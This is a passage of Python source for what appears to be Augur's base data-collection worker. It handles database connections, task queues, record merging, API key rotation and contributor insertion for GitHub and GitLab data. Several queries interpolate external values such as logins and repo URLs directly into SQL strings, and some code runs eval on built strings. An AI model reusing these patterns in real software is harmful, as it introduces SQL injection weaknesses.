'collection_errorfile': collection_errorfile
})
collection_file_handler = FileHandler(filename=self.config['collection_logfile'], mode="a")
collection_file_handler.setFormatter(formatter)
collection_file_handler.setLevel(self.config['log_level'])
collection_errorfile_handler = FileHandler(filename=self.config['collection_errorfile'], mode="a")
collection_errorfile_handler.setFormatter(error_formatter)
collection_errorfile_handler.setLevel(logging.WARNING)
logger = logging.getLogger(self.config['id'])
logger.handlers = []
logger.addHandler(collection_file_handler)
logger.addHandler(collection_errorfile_handler)
logger.setLevel(self.config['log_level'])
logger.propagate = False
if self.config['debug']:
self.config['log_level'] = 'DEBUG'
console_handler = StreamHandler()
console_handler.setFormatter(formatter)
console_handler.setLevel(self.config['log_level'])
logger.addHandler(console_handler)
if self.config['quiet']:
logger.disabled = True
self.logger = logger
def initialize_database_connections(self):
DB_STR = 'postgresql://{}:{}@{}:{}/{}'.format(
self.config['user_database'], self.config['password_database'], self.config['host_database'], self.config['port_database'], self.config['name_database']
)
# Create an sqlalchemy engine for both database schemas
self.logger.info("Making database connections")
db_schema = 'augur_data'
self.db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,
connect_args={'options': '-csearch_path={}'.format(db_schema)})
helper_schema = 'augur_operations'
self.helper_db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,
connect_args={'options': '-csearch_path={}'.format(helper_schema)})
metadata = s.MetaData()
helper_metadata = s.MetaData()
# Reflect only the tables we will use for each schema's metadata object
metadata.reflect(self.db, only=self.data_tables)
helper_metadata.reflect(self.helper_db, only=self.operations_tables)
Base = automap_base(metadata=metadata)
HelperBase = automap_base(metadata=helper_metadata)
Base.prepare()
HelperBase.prepare()
# So we can access all our tables when inserting, updating, etc
for table in self.data_tables:
setattr(self, '{}_table'.format(table), Base.classes[table].__table__)
try:
self.logger.info(HelperBase.classes.keys())
except:
pass
for table in self.operations_tables:
try:
setattr(self, '{}_table'.format(table), HelperBase.classes[table].__table__)
except Exception as e:
self.logger.error("Error setting attribute for table: {} : {}".format(table, e))
# Increment so we are ready to insert the 'next one' of each of these most recent ids
self.history_id = self.get_max_id('worker_history', 'history_id', operations_table=True) + 1
# Organize different api keys/oauths available
self.logger.info("Initializing API key.")
if 'gh_api_key' in self.config or 'gitlab_api_key' in self.config:
self.init_oauths(self.platform)
else:
self.oauths = [{'oauth_id': 0}]
@property
def results_counter(self):
""" Property that is returned when the worker's current results_counter is referenced
"""
if self.worker_type == 'facade_worker':
return self.cfg.repos_processed #TODO: figure out why this doesn't work...
else:
return self._results_counter
@results_counter.setter
def results_counter(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
self._results_counter = value
@property
def task(self):
""" Property that is returned when the worker's current task is referenced
"""
return self._task
@task.setter
def task(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
# If the task has one of our "valid" job types
if value['job_type'] == "UPDATE" or value['job_type'] == "MAINTAIN":
self._queue.put(value)
# Setting that causes paginating through ALL pages, not just unknown ones
# This setting is set by the housekeeper and is attached to the task before it gets sent here
if 'focused_task' in value:
if value['focused_task'] == 1:
self.logger.debug("Focused task is ON\n")
self.finishing_task = True
self._task = value
self.run()
def cancel(self):
""" Delete/cancel current task
"""
self._task = None
def run(self):
""" Kicks off the processing of the queue if it is not already being processed
Gets run whenever a new task is added
"""
# Spawn a subprocess to handle message reading and performing the tasks
self._child = Process(target=self.collect, args=())
self._child.start()
def collect(self):
""" Function to process each entry in the worker's task queue
Determines what action to take based off the message type
"""
self.initialize_logging() # need to initialize logging again in child process cause multiprocessing
self.logger.info("Starting data collection process\n")
self.initialize_database_connections()
while True:
if not self._queue.empty():
message = self._queue.get() # Get the task off our MP queue
else:
self.logger.info("No job found.")
break
self.logger.info("Popped off message: {}\n".format(str(message)))
if message['job_type'] == 'STOP':
break
# If task is not a valid job type
if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
raise ValueError('{} is not a recognized task type'.format(message['job_type']))
pass
# Query repo_id corresponding to repo url of given task
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(message['given'][self.given[0][0]]))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
self.logger.info("repo_id for which data collection is being initiated: {}".format(str(repo_id)))
# Call method corresponding to model sent in task
try:
model_method = getattr(self, '{}_model'.format(message['models'][0]))
self.record_model_process(repo_id, 'repo_info')
except Exception as e:
self.logger.error('Error: {}.\nNo defined method for model: {}, '.format(e, message['models'][0]) +
'must have name of {}_model'.format(message['models'][0]))
self.register_task_failure(message, repo_id, e)
break
# Model method calls wrapped in try/except so that any unexpected error that occurs can be caught
# and worker can move onto the next task without stopping
try:
self.logger.info("Calling model method {}_model".format(message['models'][0]))
self.task_info = message
self.repo_id = repo_id
self.owner, self.repo = self.get_owner_repo(list(message['given'].values())[0])
model_method(message, repo_id)
except Exception as e: # this could be a custom exception, might make things easier
self.register_task_failure(message, repo_id, e)
break
self.logger.debug('Closing database connections\n')
self.db.dispose()
self.helper_db.dispose()
self.logger.info("Collection process finished")
def sync_df_types(self, subject, source, subject_columns, source_columns):
type_dict = {}
for index in range(len(source_columns)):
if type(source[source_columns[index]].values[0]) == numpy.datetime64:
subject[subject_columns[index]] = pd.to_datetime(
subject[subject_columns[index]], utc=True
)
source[source_columns[index]] = pd.to_datetime(
source[source_columns[index]], utc=True
)
continue
type_dict[subject_columns[index]] = type(source[source_columns[index]].values[0])
subject = subject.astype(type_dict)
return subject, source
def get_sqlalchemy_type(self, data, column_name=None):
if type(data) == str:
try:
time.strptime(data, "%Y-%m-%dT%H:%M:%SZ")
return s.types.TIMESTAMP
except ValueError:
return s.types.String
elif (
isinstance(data, (int, numpy.integer))
or (isinstance(data, float) and column_name and 'id' in column_name)
):
return s.types.BigInteger
elif isinstance(data, float):
return s.types.Float
elif type(data) in [numpy.datetime64, pd._libs.tslibs.timestamps.Timestamp]:
return s.types.TIMESTAMP
elif column_name and 'id' in column_name:
return s.types.BigInteger
return s.types.String
def _convert_float_nan_to_int(self, df):
for column in df.columns:
if (
df[column].dtype == float
and ((df[column] % 1 == 0) | (df[column].isnull())).all()
):
df[column] = df[column].astype("Int64").astype(object).where(
pd.notnull(df[column]), None
)
return df
def _setup_postgres_merge(self, data_sets, sort=False):
metadata = s.MetaData()
data_tables = []
# Setup/create tables
for index, data in enumerate(data_sets):
data_table = s.schema.Table(f"merge_data_{index}_{os.getpid()}", metadata)
df = pd.DataFrame(data)
columns = sorted(list(df.columns)) if sort else df.columns
df = self._convert_float_nan_to_int(df)
for column in columns:
data_table.append_column(
s.schema.Column(
column, self.get_sqlalchemy_type(
df.fillna(method='bfill').iloc[0][column], column_name=column
)
)
)
data_tables.append(data_table)
metadata.create_all(self.db, checkfirst=True)
# Insert data to tables
for data_table, data in zip(data_tables, data_sets):
self.bulk_insert(
data_table, insert=data, increment_counter=False, convert_float_int=True
)
session = s.orm.Session(self.db)
self.logger.info("Session created for merge tables")
return data_tables, metadata, session
def _close_postgres_merge(self, metadata, session):
session.close()
self.logger.info("Session closed")
# metadata.reflect(self.db, only=[new_data_table.name, table_values_table.name])
metadata.drop_all(self.db, checkfirst=True)
self.logger.info("Merge tables dropped")
def _get_data_set_columns(self, data, columns):
if not len(data):
return []
self.logger.info("Getting data set columns")
df = pd.DataFrame(data, columns=data[0].keys())
final_columns = copy.deepcopy(columns)
for column in columns:
if '.' not in column:
continue
root = column.split('.')[0]
if root not in df.columns:
df[root] = None
expanded_column = pd.DataFrame(
df[root].where(df[root].notna(), lambda x: [{}]).tolist()
)
expanded_column.columns = [
f'{root}.{attribute}' for attribute in expanded_column.columns
]
if column not in expanded_column.columns:
expanded_column[column] = None
final_columns += list(expanded_column.columns)
try:
df = df.join(expanded_column)
except ValueError:
# columns already added (happens if trying to expand the same column twice)
# TODO: Catch this before by only looping unique prefixs?
self.logger.info("Columns have already been added, moving on...")
pass
self.logger.info(final_columns)
self.logger.info(list(set(final_columns)))
self.logger.info("Finished getting data set columns")
return df[list(set(final_columns))].to_dict(orient='records')
def organize_needed_data(
self, new_data, table_values, table_pkey, action_map={}, in_memory=True
):
if len(table_values) == 0:
return new_data, []
if len(new_data) == 0:
return [], []
need_insertion = pd.DataFrame()
need_updates = pd.DataFrame()
if not in_memory:
new_data_columns = action_map['insert']['source']
table_value_columns = action_map['insert']['augur']
if 'update' in action_map:
new_data_columns += action_map['update']['source']
table_value_columns += action_map['update']['augur']
(new_data_table, table_values_table), metadata, session = self._setup_postgres_merge(
[
self._get_data_set_columns(new_data, new_data_columns),
self._get_data_set_columns(table_values, table_value_columns)
]
)
need_insertion = pd.DataFrame(session.query(new_data_table).join(table_values_table,
eval(
' and '.join([
f"table_values_table.c.{table_column} == new_data_table.c.{source_column}" \
for table_column, source_column in zip(action_map['insert']['augur'],
action_map['insert']['source'])
])
), isouter=True).filter(
table_values_table.c[action_map['insert']['augur'][0]] == None
).all(), columns=table_value_columns)
self.logger.info("need_insertion calculated successfully")
need_updates = pd.DataFrame(columns=table_value_columns)
if 'update' in action_map:
need_updates = pd.DataFrame(session.query(new_data_table).join(table_values_table,
s.and_(
eval(' and '.join([f"table_values_table.c.{table_column} == new_data_table.c.{source_column}" for \
table_column, source_column in zip(action_map['insert']['augur'], action_map['insert']['source'])])),
eval(' and '.join([f"table_values_table.c.{table_column} != new_data_table.c.{source_column}" for \
table_column, source_column in zip(action_map['update']['augur'], action_map['update']['source'])]))
) ).all(), columns=table_value_columns)
self.logger.info("need_updates calculated successfully")
self._close_postgres_merge(metadata, session)
new_data_df = pd.DataFrame(new_data)
need_insertion, new_data_df = self.sync_df_types(
need_insertion, new_data_df, table_value_columns, new_data_columns
)
need_insertion = need_insertion.merge(
new_data_df, how='inner', left_on=table_value_columns, right_on=new_data_columns
)
self.logger.info(
f"Table needs {len(need_insertion)} insertions and "
f"{len(need_updates)} updates.\n")
else:
table_values_df = pd.DataFrame(table_values, columns=table_values[0].keys())
new_data_df = pd.DataFrame(new_data).dropna(subset=action_map['insert']['source'])
new_data_df, table_values_df = self.sync_df_types(new_data_df, table_values_df,
action_map['insert']['source'], action_map['insert']['augur'])
need_insertion = new_data_df.merge(table_values_df, suffixes=('','_table'),
how='outer', indicator=True, left_on=action_map['insert']['source'],
right_on=action_map['insert']['augur']).loc[lambda x : x['_merge']=='left_only']
if 'update' in action_map:
new_data_df, table_values_df = self.sync_df_types(new_data_df, table_values_df,
action_map['update']['source'], action_map['update']['augur'])
partitions = math.ceil(len(new_data_df) / 1000)
attempts = 0
while attempts < 50:
try:
need_updates = pd.DataFrame()
self.logger.info(f"Trying {partitions} partitions\n")
for sub_df in numpy.array_split(new_data_df, partitions):
self.logger.info(f"Trying a partition, len {len(sub_df)}\n")
need_updates = pd.concat([ need_updates, sub_df.merge(table_values_df, left_on=action_map['insert']['source'],
right_on=action_map['insert']['augur'], suffixes=('','_table'), how='inner',
indicator=False).merge(table_values_df, left_on=action_map['update']['source'],
right_on=action_map['update']['augur'], suffixes=('','_table'), how='outer',
indicator=True).loc[lambda x : x['_merge']=='left_only'] ])
self.logger.info(f"need_updates merge: {len(sub_df)} worked\n")
break
except MemoryError as e:
self.logger.info(f"new_data ({sub_df.shape}) is too large to allocate memory for " +
f"need_updates df merge.\nMemoryError: {e}\nTrying again with {partitions + 1} partitions...\n")
partitions += 1
attempts += 1
# self.logger.info(f"End attempt # {attempts}\n")
if attempts >= 50:
self.loggger.info("Max need_updates merge attempts exceeded, cannot perform " +
"updates on this repo.\n")
else:
need_updates = need_updates.drop([column for column in list(need_updates.columns) if \
column not in action_map['update']['augur'] and column not in action_map['insert']['augur']],
axis='columns')
for column in action_map['insert']['augur']:
need_updates[f'b_{column}'] = need_updates[column]
need_updates = need_updates.drop([column for column in action_map['insert']['augur']], axis='columns')
return need_insertion.to_dict('records'), need_updates.to_dict('records')
def assign_tuple_action(self, new_data, table_values, update_col_map, duplicate_col_map, table_pkey, value_update_col_map={}):
""" DEPRECATED
Include an extra key-value pair on each element of new_data that represents
the action that should be taken with this element (i.e. 'need_insertion')
:param new_data: List of dictionaries, data to be assigned an action to
:param table_values: Pandas DataFrame, existing data in the database to check
what action should be taken on the new_data depending on the presence of
each element in this DataFrame
:param update_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
updates (if source data value != value in existing database row, then an
update is needed). Key is source data column name, value is database field name.
Example: {'id': 'gh_issue_id'}
:param duplicate_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
duplicates (if source data value == value in existing database row, then this
element is a duplicate and would not need an insertion). Key is source data
column name, value is database field name. Example: {'id': 'gh_issue_id'}
:param table_pkey: String, the field name of the primary key of the table in
the database that we are checking the table_values for.
:param value_update_col_map: Dictionary, sometimes we add a new field to a table,
and we want to trigger an update of that row in the database even if all of the
data values are the same and would not need an update ordinarily. Checking for
a specific existing value in the database field allows us to do this. The key is the
name of the field in the database we are checking for a specific value to trigger
an update, the value is the value we are checking for equality to trigger an update.
Example: {'cntrb_id': None}
:return: List of dictionaries, contains all the same elements of new_data, except
each element now has an extra key-value pair with the key being 'flag', and
the value being 'need_insertion', 'need_update', or 'none'
"""
need_insertion_count = 0
need_update_count = 0
if type(table_values) == list:
if len(table_values) > 0:
table_values = pd.DataFrame(table_values, columns=table_values[0].keys())
else:
table_values = pd.DataFrame(table_values)
for i, obj in enumerate(new_data):
if type(obj) != dict:
new_data[i] = {'flag': 'none'}
continue
obj['flag'] = 'none' # default of no action needed
existing_tuple = None
for db_dupe_key in list(duplicate_col_map.keys()):
if table_values.isin([obj[duplicate_col_map[db_dupe_key]]]).any().any():
if table_values[table_values[db_dupe_key].isin(
[obj[duplicate_col_map[db_dupe_key]]])].to_dict('records'):
existing_tuple = table_values[table_values[db_dupe_key].isin(
[obj[duplicate_col_map[db_dupe_key]]])].to_dict('records')[0]
continue
obj['flag'] = 'need_insertion'
need_insertion_count += 1
break
if obj['flag'] == 'need_insertion':
continue
if not existing_tuple:
self.logger.info('An existing tuple was not found for this data ' +
'point and we have reached the check-updates portion of assigning ' +
'tuple action, so we will now move to next data point\n')
continue
# If we need to check the values of the existing tuple to determine if an update is needed
for augur_col, value_check in value_update_col_map.items():
not_nan_check = not (math.isnan(value_check) and math.isnan(existing_tuple[augur_col])) if value_check is not None else True
if existing_tuple[augur_col] != value_check and not_nan_check:
continue
self.logger.info("Found a tuple that needs an update for column: {}\n".format(augur_col))
obj['flag'] = 'need_update'
obj['pkey'] = existing_tuple[table_pkey]
need_update_count += 1
if obj['flag'] == 'need_update':
self.logger.info('Already determined that current tuple needs update, skipping checking further updates. '
'Moving to next tuple.\n')
continue
# Now check the existing tuple's values against the response values to determine if an update is needed
for col in update_col_map.keys():
if update_col_map[col] not in obj:
continue
if obj[update_col_map[col]] == existing_tuple[col]:
continue
self.logger.info("Found a tuple that needs an update for column: {}\n".format(col))
obj['flag'] = 'need_update'
self.logger.info(existing_tuple)
obj['pkey'] = existing_tuple[table_pkey]
need_update_count += 1
self.logger.info("Page recieved has {} tuples, while filtering duplicates this ".format(len(new_data)) +
"was reduced to {} tuples, and {} tuple updates are needed.\n".format(need_insertion_count, need_update_count))
return new_data
def check_duplicates(self, new_data, table_values, key):
""" Filters what items of the new_data json (list of dictionaries) that are not
present in the table_values df
:param new_data: List of dictionaries, new data to filter duplicates out of
:param table_values: Pandas DataFrame, existing data to check what data is already
present in the database
:param key: String, key of each dict in new_data whose value we are checking
duplicates with
:return: List of dictionaries, contains elements of new_data that are not already
present in the database
"""
need_insertion = []
for obj in new_data:
if type(obj) != dict:
continue
if not table_values.isin([obj[key]]).any().any():
need_insertion.append(obj)
self.logger.info("Page recieved has {} tuples, while filtering duplicates this ".format(str(len(new_data))) +
"was reduced to {} tuples.\n".format(str(len(need_insertion))))
return need_insertion
def connect_to_broker(self):
connected = False
for i in range(5):
try:
self.logger.debug("Connecting to broker, attempt {}\n".format(i))
if i > 0:
time.sleep(10)
requests.post('http://{}:{}/api/unstable/workers'.format(
self.config['host_broker'],self.config['port_broker']), json=self.specs)
self.logger.info("Connection to the broker was successful\n")
connected = True
break
except requests.exceptions.ConnectionError:
self.logger.error('Cannot connect to the broker. Trying again...\n')
if not connected:
sys.exit('Could not connect to the broker after 5 attempts! Quitting...\n')
@staticmethod
def dump_queue(queue):
""" Empties all pending items in a queue and returns them in a list.
"""
result = []
queue.put("STOP")
for i in iter(queue.get, 'STOP'):
result.append(i)
# time.sleep(.1)
return result
def find_id_from_login(self, login, platform='github'):
""" Retrieves our contributor table primary key value for the contributor with
the given GitHub login credentials, if this contributor is not there, then
they get inserted.
:param login: String, the GitHub login username to find the primary key id for
:return: Integer, the id of the row in our database with the matching GitHub login
"""
idSQL = s.sql.text("""
SELECT cntrb_id FROM contributors WHERE cntrb_login = '{}' \
AND LOWER(data_source) = '{} api'
""".format(login, platform))
rs = pd.read_sql(idSQL, self.db, params={})
data_list = [list(row) for row in rs.itertuples(index=False)]
try:
return data_list[0][0]
except:
self.logger.info('contributor needs to be added...')
if platform == 'github':
cntrb_url = ("https://api.github.com/users/" + login)
elif platform == 'gitlab':
cntrb_url = ("https://gitlab.com/api/v4/users?username=" + login )
self.logger.info("Hitting endpoint: {} ...\n".format(cntrb_url))
while True:
try:
r = requests.get(url=cntrb_url, headers=self.headers)
break
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(30)
self.update_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
if platform == 'github':
cntrb = {
'cntrb_login': contributor['login'] if 'login' in contributor else None,
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_created_at': contributor['created_at'] if 'created_at' in contributor else None,
'cntrb_canonical': None,
'gh_user_id': contributor['id'] if 'id' in contributor else None,
'gh_login': contributor['login'] if 'login' in contributor else None,
'gh_url': contributor['url'] if 'url' in contributor else None,
'gh_html_url': contributor['html_url'] if 'html_url' in contributor else None,
'gh_node_id': contributor['node_id'] if 'node_id' in contributor else None,
'gh_avatar_url': contributor['avatar_url'] if 'avatar_url' in contributor else None,
'gh_gravatar_id': contributor['gravatar_id'] if 'gravatar_id' in contributor else None,
'gh_followers_url': contributor['followers_url'] if 'followers_url' in contributor else None,
'gh_following_url': contributor['following_url'] if 'following_url' in contributor else None,
'gh_gists_url': contributor['gists_url'] if 'gists_url' in contributor else None,
'gh_starred_url': contributor['starred_url'] if 'starred_url' in contributor else None,
'gh_subscriptions_url': contributor['subscriptions_url'] if 'subscriptions_url' in contributor else None,
'gh_organizations_url': contributor['organizations_url'] if 'organizations_url' in contributor else None,
'gh_repos_url': contributor['repos_url'] if 'repos_url' in contributor else None,
'gh_events_url': contributor['events_url'] if 'events_url' in contributor else None,
'gh_received_events_url': contributor['received_events_url'] if 'received_events_url' in contributor else None,
'gh_type': contributor['type'] if 'type' in contributor else None,
'gh_site_admin': contributor['site_admin'] if 'site_admin' in contributor else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
elif platform == 'gitlab':
cntrb = {
'cntrb_login': contributor[0]['username'] if 'username' in contributor[0] else None,
'cntrb_email': email,
'cntrb_company': company,
'cntrb_location': location,
'cntrb_created_at': contributor[0]['created_at'] if 'created_at' in contributor[0] else None,
'cntrb_canonical': None,
'gh_user_id': contributor[0]['id'],
'gh_login': contributor[0]['username'],
'gh_url': contributor[0]['web_url'],
'gh_html_url': None,
'gh_node_id': None,
'gh_avatar_url': contributor[0]['avatar_url'],
'gh_gravatar_id': None,
'gh_followers_url': None,
'gh_following_url': None,
'gh_gists_url': None,
'gh_starred_url': None,
'gh_subscriptions_url': None,
'gh_organizations_url': None,
'gh_repos_url': None,
'gh_events_url': None,
'gh_received_events_url': None,
'gh_type': None,
'gh_site_admin': None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: " + str(result.inserted_primary_key))
self.results_counter += 1
self.cntrb_id_inc = int(result.inserted_primary_key[0])
self.logger.info(f"Inserted contributor: {cntrb['cntrb_login']}\n")
return self.find_id_from_login(login, platform)
def get_owner_repo(self, git_url):
""" Gets the owner and repository names of a repository from a git url
:param git_url: String, the git url of a repository
:return: Tuple, includes the owner and repository names in that order
"""
split = git_url.split('/')
owner = split[-2]
repo = split[-1]
if '.git' == repo[-4:]:
repo = repo[:-4]
return owner, repo
def get_max_id(self, table, column, default=25150, operations_table=False):
""" Gets the max value (usually used for id/pk's) of any Integer column
of any table
:param table: String, the table that consists of the column you want to
query a max value for
:param column: String, the column that you want to query the max value for
:param default: Integer, if there are no values in the
specified column, the value of this parameter will be returned
:param operations_table: Boolean, if True, this signifies that the table/column
that is wanted to be queried is in the augur_operations schema rather than
the augur_data schema. Default False
:return: Integer, the max value of the specified column/table
"""
maxIdSQL = s.sql.text("""
SELECT max({0}.{1}) AS {1}
FROM {0}
""".format(table, column))
db = self.db if not operations_table else self.helper_db
rs = pd.read_sql(maxIdSQL, db, params={})
if rs.iloc[0][column] is not None:
max_id = int(rs.iloc[0][column]) + 1
self.logger.info("Found max id for {} column in the {} table: {}\n".format(column, table, max_id))
else:
max_id = default
self.logger.warning("Could not find max id for {} column in the {} table... " +
"using default set to: {}\n".format(column, table, max_id))
return max_id
def get_table_values(self, cols, tables, where_clause=""):
""" Can query all values of any column(s) from any table(s)
with an optional where clause
:param cols: List of Strings, column(s) that user wants to query
:param tables: List of Strings, table(s) that user wants to query
:param where_clause: String, optional where clause to filter the values
queried
:return: Pandas DataFrame, contains all values queried in the columns, tables, and
optional where clause provided
"""
table_str = tables[0]
del tables[0]
col_str = cols[0]
del cols[0]
for table in tables:
table_str += ", " + table
for col in cols:
col_str += ", " + col
table_values_sql = s.sql.text("""
SELECT {} FROM {} {}
""".format(col_str, table_str, where_clause))
self.logger.info("Getting table values with the following PSQL query: \n{}\n".format(
table_values_sql))
values = pd.read_sql(table_values_sql, self.db, params={})
return values
def init_oauths(self, platform='github'):
self.oauths = []
self.headers = None
self.logger.info("Trying initialization.")
# Make a list of api key in the config combined w keys stored in the database
# Select endpoint to hit solely to retrieve rate limit
# information from headers of the response
# Adjust header keys needed to fetch rate limit information from the API responses
if platform == 'github':
url = "https://api.github.com/users/gabe-heim"
oauthSQL = s.sql.text("""
SELECT * FROM worker_oauth WHERE access_token <> '{}' and platform = 'github'
""".format(self.config['gh_api_key']))
key_name = 'gh_api_key'
rate_limit_header_key = "X-RateLimit-Remaining"
rate_limit_reset_header_key = "X-RateLimit-Reset"
elif platform == 'gitlab':
url = "https://gitlab.com/api/v4/version"
oauthSQL = s.sql.text("""
SELECT * FROM worker_oauth WHERE access_token <> '{}' and platform = 'gitlab'
""".format(self.config['gitlab_api_key']))
key_name = 'gitlab_api_key'
rate_limit_header_key = 'ratelimit-remaining'
rate_limit_reset_header_key = 'ratelimit-reset'
for oauth in [{'oauth_id': 0, 'access_token': self.config[key_name]}] + json.loads(
pd.read_sql(oauthSQL, self.helper_db, params={}).to_json(orient="records")
):
if platform == 'github':
self.headers = {'Authorization': 'token %s' % oauth['access_token']}
elif platform == 'gitlab':
self.headers = {'Authorization': 'Bearer %s' % oauth['access_token']}
response = requests.get(url=url, headers=self.headers)
self.oauths.append({
'oauth_id': oauth['oauth_id'],
'access_token': oauth['access_token'],
'rate_limit': int(response.headers[rate_limit_header_key]),
'seconds_to_reset': (
datetime.datetime.fromtimestamp(
int(response.headers[rate_limit_reset_header_key])
) - datetime.datetime.now()
).total_seconds()
})
self.logger.debug("Found OAuth available for use: {}".format(self.oauths[-1]))
if len(self.oauths) == 0:
self.logger.info(
"No API keys detected, please include one in your config or in the "
"worker_oauths table in the augur_operations schema of your database."
)
# First key to be used will be the one specified in the config (first element in
# self.oauths array will always be the key in use)
if platform == 'github':
self.headers = {'Authorization': 'token %s' % self.oauths[0]['access_token']}
elif platform == 'gitlab':
self.headers = {'Authorization': 'Bearer %s' % self.oauths[0]['access_token']}
self.logger.info("OAuth initialized\n")
def bulk_insert(
self, table, insert=[], update=[], unique_columns=[], update_columns=[],
max_attempts=3, attempt_delay=3, increment_counter=True, convert_float_int=False
):
""" Performs bulk inserts/updates of the given data to the given table
:param table: String, name of the table that we are inserting/updating rows
:param insert: List of dicts, data points to insert
:param update: List of dicts, data points to update, only needs key/value
pairs of the update_columns and the unique_columns
:param unique_columns: List of strings, column names that would uniquely identify any
given data point
:param update_columns: List of strings, names of columns that are being updated
:param max_attempts: Integer, number of attempts to perform on inserting/updating
before moving on
:param attempt_delay: Integer, number of seconds to wait in between attempts
:returns: SQLAlchemy database execution response object(s), contains metadata
about number of rows inserted etc. This data is not often used.
"""
self.logger.info(
f"{len(insert)} insertions are needed and {len(update)} "
f"updates are needed for {table}"
)
update_result = None
insert_result = None
if len(update) > 0:
attempts = 0
update_start_time = time.time()
while attempts < max_attempts:
try:
update_result = self.db.execute(
table.update().where(
eval(
' and '.join(
[
f"self.{table}_table.c.{key} == bindparam('b_{key}')"
for key in unique_columns
]
)
)
).values(
{key: key for key in update_columns}
),
update
)
if increment_counter:
self.update_counter += update_result.rowcount
self.logger.info(
f"Updated {update_result.rowcount} rows in "
f"{time.time() - update_start_time} seconds"
)
break
except Exception as e:
self.logger.info(f"Warning! Error bulk updating data: {e}")
time.sleep(attempt_delay)
attempts += 1
if len(insert) > 0:
insert_start_time = time.time()
def psql_insert_copy(table, conn, keys, data_iter):
"""
Execute SQL statement inserting data
Parameters
----------
table : pandas.io.sql.SQLTable
conn : sqlalchemy.engine.Engine or sqlalchemy.engine.Connection
keys : list of str
Column names
data_iter : Iterable that iterates the values to be inserted
"""
# gets a DBAPI connection that can provide a cursor
dbapi_conn = conn.connection
with dbapi_conn.cursor() as cur:
s_buf = io.StringIO()
writer = csv.writer(s_buf)
writer.writerows(data_iter)
s_buf.seek(0)
columns = ', '.join('"{}"'.format(k) for k in keys)
if table.schema:
table_name = '{}.{}'.format(table.schema, table.name)
else:
table_name = table.name
sql = 'COPY {} ({}) FROM STDIN WITH CSV'.format(
table_name, columns)
cur.copy_expert(sql=sql, file=s_buf)
df = pd.DataFrame(insert)
if convert_float_int:
df = self._convert_float_nan_to_int(df)
df.to_sql(
name=table.name,
con=self.db,
if_exists="append",
index=False,
method=psql_insert_copy
)
if increment_counter:
self.insert_counter += len(insert)
self.logger.info(
f"Inserted {len(insert)} rows in {time.time() - insert_start_time} seconds "
"thanks to postgresql's COPY FROM CSV! :)"
)
return insert_result, update_result
def text_clean(self, data, field):
""" "Cleans" the provided field of each dict in the list of dicts provided
by removing NUL (C text termination) characters
Example: "\u0000"
:param data: List of dicts
:param field: String
:returns: Same data list with each element's field updated with NUL characters
removed
"""
return [
{
**data_point,
field: data_point[field].replace("\x00", "\uFFFD")
} for data_point in data
]
def _add_nested_columns(self, df, column_names):
# todo: support deeper nests (>1) and only expand necessary columns
# todo: merge with _get_data_set_columns
for column in column_names:
if '.' not in column:
continue
root = column.split('.')[0]
if root not in df.columns:
df[root] = None
expanded_column = pd.DataFrame(
df[root].where(df[root].notna(), lambda x: [{}]).tolist()
)
expanded_column.columns = [
f'{root}.{attribute}' for attribute in expanded_column.columns
]
if column not in expanded_column.columns:
expanded_column[column] = None
try:
df = df.join(expanded_column)
except ValueError:
# columns already added (happens if trying to expand the same column twice)
# TODO: Catch this before by only looping unique prefixs?
pass
return df
def enrich_cntrb_id(
self, data, key, action_map_additions={'insert': {'source': [], 'augur': []}},
platform='github', prefix=''
):
if not len(data):
return data
self.logger.info(f"Enriching contributor ids for {len(data)} data points...")
source_df = pd.DataFrame(data)
expanded_source_df = self._add_nested_columns(
source_df.copy(), [key] + action_map_additions['insert']['source']
)
# Insert cntrbs that are not in db
cntrb_action_map = {
'insert': {
'source': [key] + action_map_additions['insert']['source'],
'augur': ['cntrb_login'] + action_map_additions['insert']['augur']
}
}
source_cntrb_insert, _ = self.new_organize_needed_data(
expanded_source_df.to_dict(orient='records'), augur_table=self.contributors_table,
action_map=cntrb_action_map
)
cntrb_insert = [
{
'cntrb_login': contributor[f'{prefix}login'],
'cntrb_created_at': None if (
f'{prefix}created_at' not in contributor
) else contributor[f'{prefix}created_at'],
'cntrb_email': None if f'{prefix}email' not in contributor else contributor[f'{prefix}email'],
'cntrb_company': None if f'{prefix}company' not in contributor else contributor[f'{prefix}company'],
'cntrb_location': None if (
f'{prefix}location' not in contributor
) else contributor[f'{prefix}location'],
'gh_user_id': None if (
not contributor[f'{prefix}id']
) else int(float(contributor[f'{prefix}id'])),
'gh_login': contributor[f'{prefix}login'],
'gh_url': contributor[f'{prefix}url'],
'gh_html_url': contributor[f'{prefix}html_url'],
'gh_node_id': contributor[f'{prefix}node_id'],
'gh_avatar_url': contributor[f'{prefix}avatar_url'],
'gh_gravatar_id': contributor[f'{prefix}gravatar_id'],
'gh_followers_url': contributor[f'{prefix}followers_url'],
'gh_following_url': contributor[f'{prefix}following_url'],
'gh_gists_url': contributor[f'{prefix}gists_url'],
'gh_starred_url': contributor[f'{prefix}starred_url'],
'gh_subscriptions_url': contributor[f'{prefix}subscriptions_url'],
'gh_organizations_url': contributor[f'{prefix}organizations_url'],
'gh_repos_url': contributor[f'{prefix}repos_url'],
'gh_events_url': contributor[f'{prefix}events_url'],
'gh_received_events_url': contributor[f'{prefix}received_events_url'],
'gh_type': contributor[f'{prefix}type'],
